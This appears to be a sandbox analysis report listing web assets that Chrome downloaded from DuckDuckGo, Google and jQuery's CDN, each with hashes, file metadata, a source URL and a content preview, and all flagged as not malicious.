                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 500x434, components 3
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):7708
                                                                                                                                                            Entropy (8bit):7.609964143514899
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:6PnFK+JLbGw8XhQw6v5jRS9eLtSo4Ur3ff7BSGnUGVeH3pCbjIDLRazu:6Y+JLLIhGjtSo5jf7IGFwXpgu
                                                                                                                                                            MD5:0B070C78FA5B50214EA4CB54C9765483
                                                                                                                                                            SHA1:257A72BC6676C3C718B4C46116BC6151510757BB
                                                                                                                                                            SHA-256:C76B1B5CE023817F6EDF2B0AE6D79FE07DDC6623E5810EB3E17056E29FC19CD3
                                                                                                                                                            SHA-512:C7E62A2CE4B274666110D27C75EF8A9789E7328D245D499DE406EE25947BAC4B8B10771275FE37C7042902A2E73C52439D461B9B37AC8BF5BBA42D3BFCCB71A0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/backgrounds/about-bg-dark-md-lg.jpg
                                                                                                                                                            Preview:......JFIF.....H.H.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((..........................................................................................."....*. ....B5"J....M..*..%*2...D....... .,.,....$.J.."..D....V...e.V%..... .....P.d... ..(.B$F.t(..4"&....2.+..+E....'.q...,..+(....H,H...F.SCI.B"2.MB.#++..2.D.@R.e<.$U!R.&h.2.d.. ..$BBh...iSBj.P..aV42....+..*E.)....J....3B....@(H..HDi]..U4...BiX....]J.+...2..@.O.I..XQfP.3Bf......!!..t).M..M...&.ecJ..Xe.m+...P...t.T.......A3Y...H..."F..&.BiSC.....u....R..W&ZV%.(....+....3aY.6...Y.....b.DkBhm..Biu...jV]C..e.Z..eb.)h..9.%BT!Y...6f.3Y......!..DMR&.F.SF.]..P....R...f.....A..r.I.,.S(Y.3E.L.. .....B#Z.CI.B.4&.F.t2.V]K....Yu..Xe.R((..=3...Y.B.Y.6e...d...HHi.....]..4..K.e..Yj]K..7R.Z.hT.....+.(...6f.fP.&l....J.HDi4#Z.U.]Biu..K.e....e.k..u..+D...7L.Aafl,....Y..e......"4.......cK.tj]C.......n...a)h...^...3aafk7%f..&l.....
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (7958)
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):336682
                                                                                                                                                            Entropy (8bit):5.567895780668675
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:s4sNIGKlqXuwbMvO5K1x72Dej7Zs8FVVl2pn:1sNwUXuwalI
                                                                                                                                                            MD5:9D522813B63488DF6D1E7F2969E35E94
                                                                                                                                                            SHA1:61B79676461D062FD3CFA31ED4CF76F3C5BAC5A1
                                                                                                                                                            SHA-256:9EF5DA4AC3D15DE5538D0E37B6998FFAC7DBAFBD07941F22137C9543E291664E
                                                                                                                                                            SHA-512:497A9ADF03A98C5335F20E7839997200071AF9BDABAF51653E1A1FE84028DFA7C828E683AAA7DB2BCC1E660C5319BA895398F65A21F752AF8FA4B609F9833215
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://www.googletagmanager.com/gtag/js?id=G-KHZNC1Q6K0
                                                                                                                                                            Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_dma","priority":21,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":8},{"function":"__ogt_1p_data_v2","priority":21,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_l
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):17
                                                                                                                                                            Entropy (8bit):3.6168746059562227
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:YGKeMfQ2i:YGKed2i
                                                                                                                                                            MD5:5B354DC2C2E5384D0251825957E02D04
                                                                                                                                                            SHA1:9F623851C6AF0AE4C45579045E09FBA3D3569D6C
                                                                                                                                                            SHA-256:8D7F931334620BE5881C2DCDCAD68C31EDDF15B6EDEF36F415980DBE6626F022
                                                                                                                                                            SHA-512:C7CC52025DFB553D399EB54C62F7C1C12F5547A2727710CC0BA6F8B501877DC6C71D840AAAAD1B0A2AA2CAA6074D19E51BA7CE3D5792560E3F1E1E0922331455
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/country.json
                                                                                                                                                            Preview:{"country":"US"}.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (47261)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):47262
                                                                                                                                                            Entropy (8bit):5.3974731018213795
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:+CWIsQ06lHHhw+r9sygguSwodvdq3VE3XYdze9Ddre9eom1CQWpKexThupcubvCR:uQflHBN9sygg1WViPreEM
                                                                                                                                                            MD5:E07E7ED6F75A7D48B3DF3C153EB687EB
                                                                                                                                                            SHA1:4601D83C67CC128D1E75D3E035FB8A3BDFA1EE34
                                                                                                                                                            SHA-256:96BD1C81D59D6AC2EC9F8EBE4937A315E85443667C5728A7CD9053848DD8D3D7
                                                                                                                                                            SHA-512:A0BAF8B8DF121DC9563C5C2E7B6EEE00923A1E684A6C57E3F2A4C73E0D6DD59D7E9952DF5E3CFFFB08195C8475B6ED261769AFB5581F4AB0C0A4CC342EC577C9
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):276161
                                                                                                                                                            Entropy (8bit):5.771154001601822
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:lVwTjE4yaF8qqTMBgzhl8E8iTdvha7SK6dpxnFwNvmfTlXm7OYm9Tmm2vkiaN9/D:liTjE4yaF8gBSCGJboOr0yVZb2ctH7
                                                                                                                                                            MD5:34D4FDBD47334479527C00EF23D61074
                                                                                                                                                            SHA1:F859B2D87CEFB9974A3C26FEA981D17F8142E065
                                                                                                                                                            SHA-256:ED200C57418C97EE0C2D84E45722E12DC8460A0DB1EFEBCA13C605FB1936DAF7
                                                                                                                                                            SHA-512:B0EC7F6A2AD11EC14D4DAFB9492F9ECE2E90B451922E44497C2C0AEF40F01B1BF549E05EE07DD2E5478948C7226B2772FA7450E4B157E21394BFFBBAF86CFC79
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/about
                                                                                                                                                            Preview:<!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=1 , viewport-fit=auto"/><title>About DuckDuckGo</title><meta name="description" content="We&#x27;re setting the new standard of trust online, empowering people to take control of their personal information."/><meta name="twitter:card" content="summary_large_image"/><meta name="twitter:site" content="@duckduckgo"/><meta name="twitter:title" content="About DuckDuckGo"/><meta name="twitter:description" content="We&#x27;re setting the new standard of trust online, empowering people to take control of their personal information."/><meta name="twitter:image" content="https://duckduckgo.com/assets/logo_social-media.png"/><meta property="og:url" content="https://duckduckgo.com/about"/><meta property="og:type" content="website"/><meta property="og:site_name" content="DuckDuckGo"/><meta property="og:title" content="About DuckDuckGo"/><meta property="og:
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (775)
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):1464
                                                                                                                                                            Entropy (8bit):5.334414920403844
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:kn8r0IWXK+YYNfU1Ug+x2/cZ+E/qNPIsk2LRjvEgeSE/GbUjinxGb+Wvvi3OOW8e:08r0T7lRDZ5CRteHGbFxGbfKE8Xrcn
                                                                                                                                                            MD5:694ED876A418178A27DCC716CD523169
                                                                                                                                                            SHA1:BA7D03D41092568924AAA0C0D001FA3E01AFC4D0
                                                                                                                                                            SHA-256:93E71B7986A0CF50C605093D79BA896A1DF0776430FEB70002BD33FB4C2709B8
                                                                                                                                                            SHA-512:C5DCADFF0428524C9AD32BDB84B01BCFB32E19F6ABA3291C222584AF17A53E26184816FF2AB4DD56BD3096527738F4F50A280739D839A6CB01EB276B5D438E55
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-chrome-webstore/_/js/k=boq-chrome-webstore.ChromeWebStoreConsumerFeUi.en_US.yIPKtUt8CNQ.es5.O/ck=boq-chrome-webstore.ChromeWebStoreConsumerFeUi.GtGb1vgdaaY.L.B1.O/am=SAcGA2YB/d=1/exm=A1yn5d,A7fCU,AWpPDd,BBI74,BVgquf,CfLNpd,DNlSjf,ECBKud,EEDORb,EFQ78c,FdMhB,Fu7Bjd,HsQQib,IZT63,JNoxi,KUM7Z,KfQkxf,L1AAkb,LBaJxb,LEikZe,LcrBLd,M0x0ie,MH0hJe,MI6k7c,MT4Hub,MdUzUe,Mlhmy,MpJwZc,NwH0H,O1Gjze,O626Fe,O6y8ed,OTA3Ae,OhgRI,OmgaI,PIVayb,PrPYRd,QIhFr,QVysJe,QvLWAb,R6rk4,RMhBfe,RiINWe,RqjULd,SdcwHb,SpsfSb,UUJqVe,Uas9Hd,Ug7Xab,UkbOSe,Ulmmrd,V3dDOb,V9amgb,VBl5Ff,XVMNvd,Xi0ENb,YA1iG,YYmHzb,Z5uLle,ZDZcre,ZfAoz,ZvHseb,ZwDk9d,_b,_tp,aW3pY,aurFic,bZ0mod,byfTOb,cephkf,dsBBae,duFQFc,e5qFLc,ebZ3mb,fKUV3e,gIl2M,gychg,h4ilFc,hKSk3e,hc6Ubd,i8oNZb,kBpGk,kWgXee,kjKdXe,lazG7b,lsjVmc,lwddkf,mI3LFb,mUxuKd,mdR7q,n73qwf,o2G9me,ovKuLd,p8L0ob,pjICDe,pw70Gc,qv5bsb,ri2s0b,rm99Nc,s39S4,sI9bWe,sQ8PT,tw4SJc,w9C4d,w9hDv,ws9Tlc,xQtZb,xUdipf,yDVVkb,zKiH5d,zbML3c,zr1jrb/excm=_b,_tp,itemdetailview/ed=1/wt=2/ujg=1/rs=AEP720Jfe38t-OWhOSrlVq2pOwWCRGJ40A/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;wR5FRb:YA1iG;xqZiqf:BBI74;yEQyxe:p8L0ob;yxTchf:KUM7Z;zxnPse:duFQFc/m=P6sQOc"
                                                                                                                                                            Preview:"use strict";this.default_ChromeWebStoreConsumerFeUi=this.default_ChromeWebStoreConsumerFeUi||{};(function(_){var window=this;.try{._.p("P6sQOc");.var UBa=!!(_.Vi[1]&1);var WBa=function(a,b,c,d,e){this.v=a;this.Ba=b;this.oa=c;this.Da=d;this.Aa=e;this.j=0;this.o=VBa(this)},XBa=function(a){var b={};_.Ga(a.sz(),function(e){b[e]=!0});var c=a.iz(),d=a.mz();return new WBa(a.lz(),c.j()*1E3,a.Zy(),d.j()*1E3,b)},VBa=function(a){return Math.random()*Math.min(a.Ba*Math.pow(a.oa,a.j),a.Da)},tV=function(a,b){return a.j>=a.v?!1:b!=null?!!a.Aa[b]:!0};var uV=function(a){_.L.call(this,a.Ha);this.o=a.service.CB;this.v=a.service.metadata;a=a.service.xU;this.fetch=a.fetch.bind(a)};_.F(uV,_.L);uV.Ea=function(){return{service:{CB:_.SBa,metadata:_.pV,xU:_.tO}}};uV.prototype.j=function(a,b){if(this.v.getType(a.wc())!==1)return _.Kp(a);var c=this.o.cB;(c=c?XBa(c):null)&&tV(c)?(b=YBa(this,a,b,c),a=new _.Jp(a,b,2)):a=_.Kp(a);return a};.var YBa=function(a,b,c,d){return c.then(function(e){return e},function(e){if(
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 640 x 422, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):87313
                                                                                                                                                            Entropy (8bit):7.961155181906711
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:MBNQN8uVwEEGyKUmH32ngKjs1MU9K+CFYvAbQwoSTSGWFkmnkb/lbS:MB6NneRGyK9HnMUgDbD0KvU
                                                                                                                                                            MD5:CFFE0FD094BF9A145DC8A90A3100B161
                                                                                                                                                            SHA1:C7EA6D0A5BF40595796CBF9015A2263357D144CA
                                                                                                                                                            SHA-256:E5B03FF89AF73B113D13C7A6C7C47ECE838B4EA7D9FEED2FF8FA740CCC1C51F6
                                                                                                                                                            SHA-512:B1F482FFEAA0A0B0DFD52E1503CB2357424BE4CCF0EF752EEF744704B4FF13B324C5B74C93BE1C99CD7B46514F28ED03C354A87E79CB0D3BA101A1F1089FF6A2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/image/windows/install-step-02.png
                                                                                                                                                            Preview:.PNG........IHDR...............5.....pHYs...%...%.IR$.....sRGB.........gAMA......a...T.IDATx.....mWY..1.N.y.lB...r|..BI..<.0A.]..h..P.i..<..=Z... ...Wm...`.{.AKK.XZ`k@I.V........M..<v....k......}.s.1.Z{...{...6..k.>...>f...YJ".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$.;.........xN...w...\7.a[....2~_[>w.....7.o.5...}=v...../..H...}.Xn..#.t\.7,;l.X...+..q..7..ec0.........M.c.nY.n4.....?.|...?..?..:.~...9..O\.ZE...>\3.9\$.?N..........+7..X8gp...Xv_.....q.7<.lr....X...:.......=..~.............F.g..n.{..Z..._.p..T....B;..al.,mG....b>..........H.8.?6..F>e.c...~.y.=.F..i.z7Z..0........>F.............s.#.{.F.2.c5.em..k...5..Y....=.[..<...%.P..".\{....o076..8&....
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (65447)
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):89501
                                                                                                                                                            Entropy (8bit):5.289893677458563
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                                                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):130003
                                                                                                                                                            Entropy (8bit):5.262774065321455
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:ahOCvjwxJZzcXI6+jyXu4KaEV/gbXc20ZHLwD8EaBtrRyX0n:ahOC0x96ruNiXcvh0jyxRyXa
                                                                                                                                                            MD5:2148FEAC62C3267F1ACACAE3031707C1
                                                                                                                                                            SHA1:8A568D6628A6F94161AB6268799647795E17EBEB
                                                                                                                                                            SHA-256:03A41D1F14A05121707D12E64640B67E4DC7D51026F5B0EAC7147FC4A3286CD5
                                                                                                                                                            SHA-512:1AFB38F241A114B5F85BE9891D0757A2A3C7245D80A56945D5107B850D623DF586CEAF6D646AA5618236038B305FC9493BCBAF0ED8042E7770BB2BABEC5A96D8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/chunks/framework-f8115f7fae64930e.js
                                                                                                                                                            Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[49774],{64448:function(e,t,n){var r=n(67294),l=n(96086),a=n(63840);function o(e){for(var t="https://reactjs.org/docs/error-decoder.html?invariant="+e,n=1;n<arguments.length;n++)t+="&args[]="+encodeURIComponent(arguments[n]);return"Minified React error #"+e+"; visit "+t+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}if(!r)throw Error(o(227));var u=new Set,i={};function s(e,t){c(e,t),c(e+"Capture",t)}function c(e,t){for(i[e]=t,e=0;e<t.length;e++)u.add(t[e])}var f=!("undefined"===typeof window||"undefined"===typeof window.document||"undefined"===typeof window.document.createElement),d=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD][:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:assembler source, ASCII text, with very long lines (28564), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):28564
                                                                                                                                                            Entropy (8bit):5.147808233513324
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:YYOPLK0/eL2D1y1r/HhpoWBaI/U5W8bEacoJyDVCmr8tIy16FOs8DpcXWDUV6QE/:j0/eL2D1Cs5W8b/b08tS8z
                                                                                                                                                            MD5:D0C58A4171FF52C7475102A79DBD0039
                                                                                                                                                            SHA1:332B7BCAE8AA4F295CC39A8F1134247D26AB5363
                                                                                                                                                            SHA-256:9C663E8833836CC325AD8D1B432D9D5796F36410394DB0A9F47C3FFDDE8355B9
                                                                                                                                                            SHA-512:CAFA7CEB6C451A6A01A7D346A8CCC5F74E28CDAE1FE013BD914E9D6F770CF903981D3168436527774DA8FFDC2D6F39E63F8E5194A1C602050181A3E1A3383553
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/css/335c19410475e349.css
                                                                                                                                                            Preview:.text_text__q9rvO{font-weight:var(--font-weight-normal)}.text_text-weight-heavy__JieKY{font-weight:var(--font-weight-heavy)}.text_text-weight-bold__V8HOo{font-weight:var(--font-weight-bold)}.text_text-weight-semibold__Vtb2c{font-weight:var(--font-weight-semibold)}.text_text-weight-normal__uWnDs{font-weight:var(--font-weight-normal)}.text_text-weight-light__jMKil{font-weight:var(--font-weight-light)}.text_text-xl__Es2Rn{font-size:var(--text-xl);line-height:var(--leading-loose);letter-spacing:var(--tracking-tight)}@media screen and (max-width:850px){.text_text-xl__Es2Rn.text_responsive__9czhp{font-size:var(--text-lg);line-height:var(--leading-relaxed)}}.text_text-lg__wn1El{font-size:var(--text-lg);line-height:var(--leading-relaxed);letter-spacing:var(--tracking-tight)}@media screen and (max-width:850px){.text_text-lg__wn1El.text_responsive__9czhp{font-size:var(--text-md);line-height:var(--leading-normal)}}.text_text-md__x96X3{font-size:var(--text-md);line-height:var(--leading-normal)}@me
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):4087
                                                                                                                                                            Entropy (8bit):5.005746032102585
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:WQQPgdwSBQJ51pKiSZWpD8JyzEtIdjpCFP+euKrF9bsQFDvdHd32nTP2htgeXsIu:WQQPgd3BQJvpKiSZWpD84zYItpMP+ef2
                                                                                                                                                            MD5:87C53AB728033EB6CEDB21C294EA67CA
                                                                                                                                                            SHA1:3AF9D23725B5576EDC2F08A2043F9BF2452144C8
                                                                                                                                                            SHA-256:A04AABA05A8830CC55F1CBECB7BF4F5100D6BB7FF3D805D0D3ECB3CB29E172B0
                                                                                                                                                            SHA-512:080D7A0360180CEE90FB046EC868196A5643EE8B642190F1BC49CE913C64D5BE0ED3ACF74E5866183D01A8F7EDAAF79955A04B438187DB4E277E2CFB08D85E4D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/data/kMKb7Bj0jhFmsUIWJjIQE/about.json
                                                                                                                                                            Preview:{"pageProps":{"translations":{"locale":"en-US","messages":{"32k7NP":[{"type":0,"value":"Learn More"}],"qffLa3":[{"type":0,"value":"NEW"}],"7NUyVN":[{"type":0,"value":"More from DuckDuckGo"}],"0pHSXl":[{"type":0,"value":"Downloads"}],"aqcGw9":[{"type":0,"value":"Search"}],"avoqNl":[{"type":0,"value":"Other Resources"}],"KpnRFa":[{"type":0,"value":"Android Browser"}],"irtBA+":[{"type":0,"value":"Email Protection"}],"kovAeP":[{"type":0,"value":"Themes"}],"1//Wzy":[{"type":0,"value":"Settings"}],"F8YRUV":[{"type":0,"value":"Mac Browser"}],"Ptbguk":[{"type":0,"value":"Windows Browser"}],"amPlaq":[{"type":0,"value":"Browser Extensions"}],"XQM/H9":[{"type":0,"value":"iOS Browser"}],"k0sRjT":[{"type":0,"value":"Homepage"}],"Mt9udP":[{"offset":0,"options":{"one":{"value":[{"type":0,"value":"1 million reviews"}]},"other":{"value":[{"type":7},{"type":0,"value":" million reviews"}]}},"pluralType":"cardinal","type":6,"value":"num"}],"uutXgw":[{"offset":0,"options":{"one":{"value":[{"type":0,"value"
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 275x175, components 3
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):7646
                                                                                                                                                            Entropy (8bit):7.779122527959847
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:0rdurOxpbgoXWrhJkvX6zPv2BoOC9hI5o59edYNJNCUzs1KX9hYhnpO7U4vmn:yWgpbgomrhivX6pO0Gc9edYNJo4+4vmn
                                                                                                                                                            MD5:0BFB69DAC8570F6752C294B1132C1D0C
                                                                                                                                                            SHA1:362683E0BABB8FF379BA7CE7DA1857D6E0D04D1C
                                                                                                                                                            SHA-256:F0F7AD53D1D35BD05F4A64A31B6AB6C55D3ECE29009B0A803399B843069713A8
                                                                                                                                                            SHA-512:64DD8419FE99D2C1384BF25002921CE8183A690A9141A480F976AB2CE983F119CDB68DCF7472AB9D4EB1CF922D20D0158F78402497C0C06C31D1C105F1BFA569
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://lh3.googleusercontent.com/Q3rRqV2wEHrrQzVuZ68f5nHqGvLL756gXSLDgGgPdubewYeYD_YH94dSath7bDE_eXvTkax2FQFgkOvSMFMeRfS0VDA=s275-w275-h175
                                                                                                                                                            Preview:......JFIF.....................................................................................................................................................................................................>..........................!...T.."1A.....Q#aq2BR...$Dbcr..3C...............................A......................!Q...1A.Saq.....".....2.BRr..#.....$bs...............?.......@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@..6...b.T..H...O@..I. ....W..x.MwEl.....q.._....o...l..U...u.f.F..:.7.u..q.{...e.........@....@....@....@....@....@....@.......h.*.4.zK.&V].........\{.@kf.hF ;...'..F.o....J._V.dsWx....|..v....k...a...VT..jWc.ez...j.%c...@.%vS3..S...]w5..1.t...zyv9.3...F.3s..s...}.[.[.....2mY..rS..P.(@.N.i...h..q..>...c...=.=,...2...uM..B....Y.....b.....xp@].s..{bsT...SRr.j..o...#E%.w......E.....v.&..RZ......+....F......w ....ov......
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):16
                                                                                                                                                            Entropy (8bit):3.75
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:HhXnhiCRn:rn
                                                                                                                                                            MD5:835FFE887D85727159FE340C1DDC4E39
                                                                                                                                                            SHA1:7ABC702C0A222E99625A30BFF6193DD81707B43C
                                                                                                                                                            SHA-256:413F49399EBB73D79E248653CB3CB0FCA401A978200CE382D6B8C8EF657DA003
                                                                                                                                                            SHA-512:965872948D64E20D9A9E73A5CDFA0876F2EAF75AE65B99404D81E516F6E9DBB7584A0FD3D5757C9BE361FA91854E5AF9FBEE876A38F99354597ACC1A99B62285
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAllZnCaqz3OhhIFDYzGkEM=?alt=proto
                                                                                                                                                            Preview:CgkKBw2MxpBDGgA=
